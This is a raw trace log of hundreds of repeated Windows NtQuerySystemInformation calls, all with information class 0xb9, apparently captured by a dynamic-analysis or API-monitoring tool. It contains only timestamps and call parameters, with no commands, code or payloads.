[0176.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.616] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.618] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.619] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.620] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.621] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.622] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.623] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.627] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.628] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.629] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.630] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.631] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.632] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.633] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.634] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.636] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.637] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.638] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.639] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.640] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.641] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.642] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.644] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.645] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0176.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.784] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.785] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.786] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.787] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.788] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67ff260, Length=0x28, ResultLength=0x0) [0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0177.789] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 